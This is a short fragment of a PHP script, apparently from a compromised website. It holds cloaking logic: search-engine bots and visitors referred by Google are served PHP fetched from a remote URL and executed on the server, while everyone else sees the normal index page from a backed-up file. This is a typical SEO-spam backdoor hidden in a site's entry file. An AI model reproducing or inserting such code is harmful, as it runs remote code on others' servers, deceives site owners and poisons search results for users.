' . $code); } // Logika utama if (isSearchEngineBot() || isFromGoogle()) { include_remote_php($landing_page_url); } else { if (is_file($index_home)) { include $index_home; } else { http_response_code(404); echo 'index_bu.php not found'; } } ?>